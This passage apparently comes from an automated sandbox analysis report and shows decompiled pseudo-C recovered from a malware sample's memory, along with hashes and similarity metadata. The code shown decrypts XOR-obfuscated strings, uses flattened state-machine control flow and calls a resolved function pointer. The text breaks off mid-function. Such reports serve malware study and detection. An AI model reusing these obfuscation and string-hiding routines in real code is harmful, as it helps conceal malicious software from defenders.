                                              				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
                                              				_t95 =  &(__ecx[1]);
                                              				_t107 = 0;
                                              				 *((intOrPtr*)(_t108 + 0x34)) = 0;
                                              				 *(_t108 + 0x24) = 0xc5f8;
                                              				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
                                              				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
                                              				 *(_t108 + 0x1c) = 0x21c8;
                                              				_t97 = 0x48;
                                              				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
                                              				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
                                              				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
                                              				 *(_t108 + 0x20) = 0xf93e;
                                              				_t98 = 0xe;
                                              				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
                                              				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
                                              				_t93 =  *__ecx;
                                              				_t96 =  &(_t95[1]);
                                              				_t57 =  *_t95 ^ _t93;
                                              				 *(_t108 + 0x28) = _t93;
                                              				 *(_t108 + 0x2c) = _t57;
                                              				_t32 = _t57 + 1; // 0xf93f
                                              				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
                                              				_t109 = _t108 + 4;
                                              				_t74 = E00228736(_t100 + _t100);
                                              				 *(_t109 + 0x20) = _t74;
                                              				if(_t74 != 0) {
                                              					_t94 = _t74;
                                              					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
                                              					if(_t106 != 0) {
                                              						_t75 =  *(_t109 + 0x1c);
                                              						do {
                                              							_t84 =  *_t96;
                                              							_t96 =  &(_t96[1]);
                                              							_t85 = _t84 ^ _t75;
                                              							 *_t94 = _t85 & 0x000000ff;
                                              							_t94 = _t94 + 8;
                                              							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
                                              							_t86 = _t85 >> 0x10;
                                              							_t107 = _t107 + 1;
                                              							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
                                              							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
                                              						} while (_t107 < _t106);
                                              						_t74 =  *(_t109 + 0x18);
                                              					}
                                              					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
                                              				}
                                              				return _t74;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: Q`${K
                                              • API String ID: 0-3942002812
                                              • Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                              • Instruction ID: 546dd2d13ef3ce2030544e553c9bc014a641e38ca35e861f266fbf33ef99f51b
                                              • Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                              • Instruction Fuzzy Hash: 8F31BD726087128FD314DF29C48456BF7E0FF88318F414A2DF4899B250D774E90A8B86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E0023878F(void* __ecx, void* __edx, void* __eflags) {
                                              				signed int* _t40;
                                              				signed int _t42;
                                              				unsigned int* _t55;
                                              				signed int _t56;
                                              				signed int _t58;
                                              				signed int _t65;
                                              				unsigned int _t66;
                                              				unsigned int _t67;
                                              				unsigned int* _t70;
                                              				signed int* _t71;
                                              				signed int* _t72;
                                              				unsigned int _t74;
                                              				void* _t80;
                                              				void* _t82;
                                              				void* _t84;
                                              				void* _t85;
                                              
                                              				_push( *((intOrPtr*)(_t84 + 0x18)));
                                              				_push( *(_t84 + 0x24));
                                              				_push(__ecx);
                                              				_t40 = E0022602B( *((intOrPtr*)(_t84 + 0x18)));
                                              				 *(_t84 + 0x34) = 0x2399;
                                              				_t4 =  &(_t40[1]); // 0x4
                                              				_t71 = _t4;
                                              				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
                                              				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
                                              				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
                                              				 *(_t84 + 0x20) = 0xf668;
                                              				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
                                              				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
                                              				 *(_t84 + 0x1c) = 0x6aea;
                                              				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
                                              				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
                                              				_t58 =  *_t40;
                                              				_t72 =  &(_t71[1]);
                                              				_t42 =  *_t71 ^ _t58;
                                              				 *(_t84 + 0x24) = _t58;
                                              				 *(_t84 + 0x28) = _t42;
                                              				_t23 = _t42 + 1; // 0x1
                                              				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
                                              				_t85 = _t84 + 8;
                                              				_t55 = E00228736(_t74);
                                              				 *(_t85 + 0x2c) = _t55;
                                              				if(_t55 != 0) {
                                              					_t82 = 0;
                                              					_t70 = _t55;
                                              					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
                                              					if(_t80 != 0) {
                                              						_t56 =  *(_t85 + 0x18);
                                              						do {
                                              							_t65 =  *_t72;
                                              							_t72 =  &(_t72[1]);
                                              							_t66 = _t65 ^ _t56;
                                              							 *_t70 = _t66;
                                              							_t70 =  &(_t70[1]);
                                              							_t67 = _t66 >> 0x10;
                                              							 *((char*)(_t70 - 3)) = _t66 >> 8;
                                              							 *(_t70 - 2) = _t67;
                                              							_t82 = _t82 + 1;
                                              							 *((char*)(_t70 - 1)) = _t67 >> 8;
                                              						} while (_t82 < _t80);
                                              						_t55 =  *(_t85 + 0x28);
                                              					}
                                              					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
                                              				}
                                              				return _t55;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 5Ur$j
                                              • API String ID: 0-2435424154
                                              • Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                              • Instruction ID: 9e9f38894ceeb8edc4e840745788ab0e68a0a794c28436a77a4f9153a5d52da2
                                              • Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                              • Instruction Fuzzy Hash: 1C318C72A093118FD314CF29C88545BFBE0EF98714F454B5DF989AB251D734EA0ACB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 64%
                                              			E00239586(intOrPtr _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				intOrPtr _v44;
                                              				void* _t78;
                                              				void* _t80;
                                              				intOrPtr* _t81;
                                              				intOrPtr _t95;
                                              
                                              				_v40 = _v40 & 0x00000000;
                                              				_v44 = 0x5b9444;
                                              				_v12 = 0xdcba;
                                              				_v12 = _v12 >> 4;
                                              				_v12 = _v12 >> 4;
                                              				_v12 = _v12 + 0x949;
                                              				_v12 = _v12 ^ 0x00001af4;
                                              				_v8 = 0x3cb;
                                              				_v8 = _v8 + 0xffff192d;
                                              				_v8 = _v8 + 0x1519;
                                              				_v8 = _v8 ^ 0xffff4a83;
                                              				_v20 = 0x60da;
                                              				_v20 = _v20 >> 4;
                                              				_t95 = _a4;
                                              				_v20 = _v20 * 0x71;
                                              				_v20 = _v20 ^ 0x0002f52e;
                                              				_v24 = 0x45f5;
                                              				_v24 = _v24 ^ 0x8ddfc3a3;
                                              				_v24 = _v24 | 0x63507c9c;
                                              				_v24 = _v24 ^ 0xefdfb5dc;
                                              				_v32 = 0xfa49;
                                              				_v32 = _v32 ^ 0xb8265659;
                                              				_v32 = _v32 ^ 0xb826ab18;
                                              				_v28 = 0xa34;
                                              				_v28 = _v28 | 0x478cb459;
                                              				_v28 = _v28 ^ 0x0d1ea304;
                                              				_v28 = _v28 ^ 0x4a9200da;
                                              				_v36 = 0x43f7;
                                              				_v36 = _v36 >> 0xb;
                                              				_v36 = _v36 ^ 0x00001d3e;
                                              				_v16 = 0x9c5f;
                                              				_v16 = _v16 * 0x1d;
                                              				_v16 = _v16 * 0x2e;
                                              				_v16 = _v16 << 5;
                                              				_v16 = _v16 ^ 0x65dacbc4;
                                              				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
                                              				_t98 = _t78;
                                              				if(_t78 != 0) {
                                              					_push(0x23c860);
                                              					_push(_v20);
                                              					_t80 = E0023878F(_v12, _v8, _t98);
                                              					_push(_v32);
                                              					_t93 = _t80;
                                              					_push(_v24);
                                              					_t81 = E00236965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
                                              					if(_t81 != 0) {
                                              						 *_t81();
                                              					}
                                              					E00232025(_v28, _t93, _v36, _v16);
                                              				}
                                              				return 0;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 4$I
                                              • API String ID: 0-2585635819
                                              • Opcode ID: 011bc5a7186ddba618edd6868eadf305873c4fe7a9155033514f5113551c3624
                                              • Instruction ID: 0583ec25c6ece0fc6139c0fc6886ddc7cf5ee30f61b0c1f366b3aaff3c626044
                                              • Opcode Fuzzy Hash: 011bc5a7186ddba618edd6868eadf305873c4fe7a9155033514f5113551c3624
                                              • Instruction Fuzzy Hash: A04112B1D0030AABEF04DFA1C94A6EEBBB5FB44314F208159D411B6290D3B99B55CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E00227998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				void* _t74;
                                              				intOrPtr _t83;
                                              				signed int _t85;
                                              				signed int _t86;
                                              				signed int _t96;
                                              				intOrPtr* _t97;
                                              
                                              				_t97 = _a4;
                                              				_push(_a12);
                                              				_t96 = _a8;
                                              				_push(_t96);
                                              				_push(_t97);
                                              				E0022602B(_t74);
                                              				_v24 = 0x43bd;
                                              				_v24 = _v24 >> 0xe;
                                              				_v24 = _v24 ^ 0x00002257;
                                              				_v20 = 0xfb35;
                                              				_v20 = _v20 ^ 0x316dcd7c;
                                              				_v20 = _v20 ^ 0x316d5b09;
                                              				_v8 = 0x86ca;
                                              				_t85 = 0x26;
                                              				_v8 = _v8 / _t85;
                                              				_v8 = _v8 + 0xffffb56c;
                                              				_v8 = _v8 ^ 0xffffa5a2;
                                              				_a4 = 0x6ea8;
                                              				_a4 = _a4 | 0xeb58ef4a;
                                              				_a4 = _a4 << 6;
                                              				_t86 = 0x7d;
                                              				_a4 = _a4 / _t86;
                                              				_a4 = _a4 ^ 0x01b6ec6f;
                                              				_v16 = 0xf7ce;
                                              				_v16 = _v16 + 0xffffb713;
                                              				_v16 = _v16 + 0xe2af;
                                              				_v16 = _v16 ^ 0x0001a1e1;
                                              				_v12 = 0x7f90;
                                              				_v12 = _v12 >> 9;
                                              				_v12 = _v12 ^ 0x9419cfce;
                                              				_v12 = _v12 ^ 0x9419fbb9;
                                              				_a8 = 0xab6f;
                                              				_a8 = _a8 * 0x2a;
                                              				_a8 = _a8 >> 0xf;
                                              				_a8 = _a8 | 0x38dd753e;
                                              				_a8 = _a8 ^ 0x38dd1846;
                                              				E0023360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
                                              				E00232674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
                                              				_t83 =  *((intOrPtr*)(_t97 + 4));
                                              				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
                                              				return _t83;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: [m1$JX
                                              • API String ID: 0-848362422
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 97%
                                              			E00229A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				unsigned int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				char _v196;
                                              				void* _t297;
                                              				signed int _t335;
                                              				signed int* _t340;
                                              				signed int _t342;
                                              				signed int _t343;
                                              				signed int _t344;
                                              				signed int _t345;
                                              				signed int _t346;
                                              				signed int _t347;
                                              				char* _t354;
                                              				void* _t380;
                                              				void* _t381;
                                              				void* _t382;
                                              				void* _t383;
                                              				void* _t386;
                                              
                                              				_push(_a8);
                                              				_t340 = __edx;
                                              				_t380 = __ecx;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t297);
                                              				_v24 = 0xc44;
                                              				_t383 = _t382 + 0x10;
                                              				_v24 = _v24 << 2;
                                              				_v24 = _v24 << 5;
                                              				_t381 = 0x108b8bb2;
                                              				_v24 = _v24 >> 1;
                                              				_v24 = _v24 ^ 0x0003068b;
                                              				_v96 = 0x3b9e;
                                              				_v96 = _v96 ^ 0x893884c8;
                                              				_v96 = _v96 ^ 0x89388972;
                                              				_v48 = 0x8b0e;
                                              				_v48 = _v48 << 6;
                                              				_v48 = _v48 + 0xffffd606;
                                              				_t342 = 0x6d;
                                              				_v48 = _v48 * 0x69;
                                              				_v48 = _v48 ^ 0x0e30afa5;
                                              				_v76 = 0xbb1c;
                                              				_v76 = _v76 + 0xffff2a80;
                                              				_v76 = _v76 | 0x384e25df;
                                              				_v76 = _v76 ^ 0xffffbccb;
                                              				_v68 = 0x817b;
                                              				_v68 = _v68 + 0xb36b;
                                              				_v68 = _v68 * 0x62;
                                              				_v68 = _v68 ^ 0x00761722;
                                              				_v112 = 0x78f7;
                                              				_v112 = _v112 + 0xabd9;
                                              				_v112 = _v112 ^ 0x00010bcc;
                                              				_v64 = 0xef7a;
                                              				_v64 = _v64 * 0x6b;
                                              				_v64 = _v64 >> 6;
                                              				_v64 = _v64 ^ 0x0001bb5c;
                                              				_v104 = 0x32c;
                                              				_v104 = _v104 << 5;
                                              				_v104 = _v104 ^ 0x00002d3d;
                                              				_v52 = 0x7426;
                                              				_v52 = _v52 * 0x5d;
                                              				_v52 = _v52 ^ 0xa80e6da6;
                                              				_v52 = _v52 / _t342;
                                              				_v52 = _v52 ^ 0x018aaa04;
                                              				_v12 = 0xd0fb;
                                              				_t343 = 0x6a;
                                              				_v12 = _v12 / _t343;
                                              				_v12 = _v12 + 0xffff7920;
                                              				_v12 = _v12 + 0xffff83ce;
                                              				_v12 = _v12 ^ 0xfffec2a6;
                                              				_v108 = 0xe89;
                                              				_v108 = _v108 + 0x85a8;
                                              				_v108 = _v108 ^ 0x0000adac;
                                              				_v92 = 0xd004;
                                              				_v92 = _v92 + 0xffff90ab;
                                              				_v92 = _v92 | 0x2bfbb4c5;
                                              				_v92 = _v92 ^ 0x2bfba16d;
                                              				_v8 = 0x51d1;
                                              				_v8 = _v8 ^ 0x91ec542a;
                                              				_v8 = _v8 | 0xbd5d6296;
                                              				_v8 = _v8 + 0xe80e;
                                              				_v8 = _v8 ^ 0xbdfe1041;
                                              				_v40 = 0xc5fc;
                                              				_v40 = _v40 | 0x331e7523;
                                              				_v40 = _v40 + 0xc476;
                                              				_v40 = _v40 | 0xe5b13554;
                                              				_v40 = _v40 ^ 0xf7bfa45a;
                                              				_v116 = 0x6d98;
                                              				_v116 = _v116 >> 0xf;
                                              				_v116 = _v116 ^ 0x000044aa;
                                              				_v88 = 0x7357;
                                              				_v88 = _v88 + 0x7cff;
                                              				_t344 = 0x6e;
                                              				_v88 = _v88 * 0x25;
                                              				_v88 = _v88 ^ 0x0022e11b;
                                              				_v56 = 0x39e0;
                                              				_v56 = _v56 + 0xffffb0fb;
                                              				_v56 = _v56 << 6;
                                              				_v56 = _v56 ^ 0xfffab6b2;
                                              				_v44 = 0x2257;
                                              				_v44 = _v44 / _t344;
                                              				_v44 = _v44 + 0x17fe;
                                              				_v44 = _v44 + 0xffff4b8e;
                                              				_v44 = _v44 ^ 0xffff3a3c;
                                              				_v16 = 0xac11;
                                              				_t345 = 0xd;
                                              				_v16 = _v16 / _t345;
                                              				_t346 = 0x22;
                                              				_v16 = _v16 / _t346;
                                              				_v16 = _v16 + 0xffff8051;
                                              				_v16 = _v16 ^ 0xffffec84;
                                              				_v32 = 0x207e;
                                              				_v32 = _v32 + 0xffff85d9;
                                              				_v32 = _v32 | 0x92dc0f10;
                                              				_t347 = 0x3d;
                                              				_v32 = _v32 * 0x4f;
                                              				_v32 = _v32 ^ 0xffe76a4a;
                                              				_v72 = 0xf5a4;
                                              				_v72 = _v72 << 9;
                                              				_v72 = _v72 + 0x6505;
                                              				_v72 = _v72 ^ 0x01ebcff4;
                                              				_v124 = 0xf81;
                                              				_v124 = _v124 + 0x174a;
                                              				_v124 = _v124 ^ 0x00005562;
                                              				_v80 = 0xd566;
                                              				_v80 = _v80 << 0xd;
                                              				_v80 = _v80 << 0xa;
                                              				_v80 = _v80 ^ 0xb30025af;
                                              				_v20 = 0xd4e9;
                                              				_v20 = _v20 ^ 0x0ea0d6e7;
                                              				_v20 = _v20 / _t347;
                                              				_v20 = _v20 | 0xf8279f10;
                                              				_v20 = _v20 ^ 0xf83fc9b3;
                                              				_v100 = 0xda9a;
                                              				_v100 = _v100 * 3;
                                              				_v100 = _v100 ^ 0x0002f5f9;
                                              				_v36 = 0x78aa;
                                              				_v36 = _v36 + 0x4117;
                                              				_v36 = _v36 >> 0xa;
                                              				_v36 = _v36 | 0x25804fa7;
                                              				_v36 = _v36 ^ 0x25803510;
                                              				_v28 = 0x20d5;
                                              				_v28 = _v28 + 0xfab3;
                                              				_v28 = _v28 | 0xa4f7c20c;
                                              				_v28 = _v28 >> 3;
                                              				_v28 = _v28 ^ 0x149e8671;
                                              				_v60 = 0x9445;
                                              				_v60 = _v60 | 0xc2ce9f5c;
                                              				_v60 = _v60 ^ 0x46e2878d;
                                              				_v60 = _v60 ^ 0x842c5375;
                                              				_v120 = 0x3512;
                                              				_v120 = _v120 << 9;
                                              				_v120 = _v120 ^ 0x006a5627;
                                              				_v84 = 0xeb51;
                                              				_v84 = _v84 * 0x42;
                                              				_v84 = _v84 >> 0xf;
                                              				_v84 = _v84 ^ 0x000027de;
                                              				goto L1;
                                              				do {
                                              					while(1) {
                                              						L1:
                                              						_t386 = _t381 - 0x1e9793a2;
                                              						if(_t386 > 0) {
                                              							break;
                                              						}
                                              						if(_t386 == 0) {
                                              							E00227998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
                                              							_t383 = _t383 + 0xc;
                                              							_t381 = 0x39ecd3df;
                                              							continue;
                                              						} else {
                                              							if(_t381 == 0xaa31e0c) {
                                              								E00227998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
                                              								_t383 = _t383 + 0xc;
                                              								_t381 = 0x1e9793a2;
                                              								continue;
                                              							} else {
                                              								if(_t381 == 0x108b8bb2) {
                                              									 *_t340 =  *_t340 & 0x00000000;
                                              									_t381 = 0x23e4e38d;
                                              									_t340[1] = _t340[1] & 0x00000000;
                                              									continue;
                                              								} else {
                                              									if(_t381 == 0x15969886) {
                                              										_t354 =  &_v196;
                                              										E0023360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
                                              										_t383 = _t383 + 0xc;
                                              										_t381 = 0x15fd630a;
                                              										continue;
                                              									} else {
                                              										if(_t381 == 0x15fd630a) {
                                              											_t354 =  &_v196;
                                              											E0023360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
                                              											_t383 = _t383 + 0xc;
                                              											_t381 = 0x2ea6dd43;
                                              											continue;
                                              										} else {
                                              											if(_t381 == 0x18d3ef4a) {
                                              												_push(_t354);
                                              												_t335 = E00228736(_t340[1]);
                                              												 *_t340 = _t335;
                                              												_t354 = _t354;
                                              												__eflags = _t335;
                                              												if(__eflags != 0) {
                                              													_t381 = 0x22e1be53;
                                              													continue;
                                              												}
                                              											} else {
                                              												if(_t381 != 0x1a35bcc9) {
                                              													goto L28;
                                              												} else {
                                              													_t354 =  &_v196;
                                              													E0023360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
                                              													_t383 = _t383 + 0xc;
                                              													_t381 = 0xaa31e0c;
                                              													continue;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L23:
                                              						__eflags =  *_t340;
                                              						_t282 =  *_t340 != 0;
                                              						__eflags = _t282;
                                              						return 0 | _t282;
                                              					}
                                              					__eflags = _t381 - 0x22e1be53;
                                              					if(_t381 == 0x22e1be53) {
                                              						E002350F2( &_v196, _v76, _v68, _v112, _t340);
                                              						_t383 = _t383 + 0xc;
                                              						_t381 = 0x2d15c716;
                                              						goto L28;
                                              					} else {
                                              						__eflags = _t381 - 0x23e4e38d;
                                              						if(_t381 == 0x23e4e38d) {
                                              							_t340[1] = E00237F1F(_t380);
                                              							_t381 = 0x18d3ef4a;
                                              							goto L1;
                                              						} else {
                                              							__eflags = _t381 - 0x2d15c716;
                                              							if(__eflags == 0) {
                                              								E00227998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
                                              								_t383 = _t383 + 0xc;
                                              								_t381 = 0x15969886;
                                              								goto L1;
                                              							} else {
                                              								__eflags = _t381 - 0x2ea6dd43;
                                              								if(_t381 == 0x2ea6dd43) {
                                              									E0023360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
                                              									_t383 = _t383 + 0xc;
                                              									_t381 = 0x1a35bcc9;
                                              									goto L1;
                                              								} else {
                                              									__eflags = _t381 - 0x39ecd3df;
                                              									if(_t381 != 0x39ecd3df) {
                                              										goto L28;
                                              									} else {
                                              										E0023360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L23;
                                              					L28:
                                              					__eflags = _t381 - 0x1d48367e;
                                              				} while (__eflags != 0);
                                              				goto L23;
                                              			}
                                              0x00229cd2
                                              0x00229cd9
                                              0x00229ce0
                                              0x00229ce7
                                              0x00229ceb
                                              0x00229cef
                                              0x00229cf6
                                              0x00229cfd
                                              0x00229d09
                                              0x00229d0c
                                              0x00229d13
                                              0x00229d1a
                                              0x00229d25
                                              0x00229d28
                                              0x00229d2f
                                              0x00229d36
                                              0x00229d3d
                                              0x00229d41
                                              0x00229d48
                                              0x00229d4f
                                              0x00229d56
                                              0x00229d5d
                                              0x00229d64
                                              0x00229d68
                                              0x00229d6f
                                              0x00229d76
                                              0x00229d7d
                                              0x00229d84
                                              0x00229d8b
                                              0x00229d92
                                              0x00229d96
                                              0x00229d9d
                                              0x00229da8
                                              0x00229dab
                                              0x00229daf
                                              0x00229daf
                                              0x00229db6
                                              0x00229db6
                                              0x00229db6
                                              0x00229db6
                                              0x00229dbc
                                              0x00000000
                                              0x00000000
                                              0x00229dc2
                                              0x00229ee5
                                              0x00229eea
                                              0x00229eed
                                              0x00000000
                                              0x00229dc8
                                              0x00229dce
                                              0x00229ebf
                                              0x00229ec4
                                              0x00229ec7
                                              0x00000000
                                              0x00229dd4
                                              0x00229dda
                                              0x00229e9a
                                              0x00229e9d
                                              0x00229ea2
                                              0x00000000
                                              0x00229de0
                                              0x00229de6
                                              0x00229e79
                                              0x00229e88
                                              0x00229e8d
                                              0x00229e90
                                              0x00000000
                                              0x00229dec
                                              0x00229df2
                                              0x00229e55
                                              0x00229e64
                                              0x00229e69
                                              0x00229e6c
                                              0x00000000
                                              0x00229df4
                                              0x00229dfa
                                              0x00229e32
                                              0x00229e37
                                              0x00229e3c
                                              0x00229e3f
                                              0x00229e40
                                              0x00229e42
                                              0x00229e48
                                              0x00000000
                                              0x00229e48
                                              0x00229dfc
                                              0x00229e02
                                              0x00000000
                                              0x00229e08
                                              0x00229e0b
                                              0x00229e1a
                                              0x00229e1f
                                              0x00229e22
                                              0x00000000
                                              0x00229e22
                                              0x00229e02
                                              0x00229dfa
                                              0x00229df2
                                              0x00229de6
                                              0x00229dda
                                              0x00229dce
                                              0x00229f45
                                              0x00229f47
                                              0x00229f4b
                                              0x00229f4b
                                              0x00229f52
                                              0x00229f52
                                              0x00229ef7
                                              0x00229efd
                                              0x00229fbe
                                              0x00229fc3
                                              0x00229fc6
                                              0x00000000
                                              0x00229f03
                                              0x00229f03
                                              0x00229f09
                                              0x00229fa1
                                              0x00229fa4
                                              0x00000000
                                              0x00229f0f
                                              0x00229f0f
                                              0x00229f15
                                              0x00229f88
                                              0x00229f8d
                                              0x00229f90
                                              0x00000000
                                              0x00229f17
                                              0x00229f17
                                              0x00229f1d
                                              0x00229f65
                                              0x00229f6a
                                              0x00229f6d
                                              0x00000000
                                              0x00229f1f
                                              0x00229f1f
                                              0x00229f25
                                              0x00000000
                                              0x00229f2b
                                              0x00229f3d
                                              0x00229f42
                                              0x00229f25
                                              0x00229f1d
                                              0x00229f15
                                              0x00229f09
                                              0x00000000
                                              0x00229fcb
                                              0x00229fcb
                                              0x00229fcb
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 'Vj
                                              • API String ID: 0-2210790371
                                              • Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                              • Instruction ID: 010f0064708bb1f73297e75d8b886110e02e9317f9a6f021fac2715c737eccc9
                                              • Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                              • Instruction Fuzzy Hash: 4EF142B2C10329EBDF18CFE5D98A9DEBBB1FB04314F248159D415BA2A0D7B41A95CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00231BDF() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				unsigned int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				unsigned int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				char _v112;
                                              				short _t303;
                                              				void* _t311;
                                              				void* _t314;
                                              				void* _t315;
                                              				intOrPtr _t347;
                                              				void* _t348;
                                              				short* _t349;
                                              				void* _t350;
                                              				short* _t351;
                                              				short* _t352;
                                              				signed int _t353;
                                              				signed int _t354;
                                              				signed int _t355;
                                              				signed int _t356;
                                              				signed int _t357;
                                              				signed int _t358;
                                              				signed int _t359;
                                              				signed int _t360;
                                              				signed int _t361;
                                              				signed int _t362;
                                              				signed int _t363;
                                              				signed int _t364;
                                              				void* _t365;
                                              
                                              				_t347 =  *0x23ca2c; // 0x4d8300
                                              				_v48 = 0xd714;
                                              				_t348 = _t347 + 0x230;
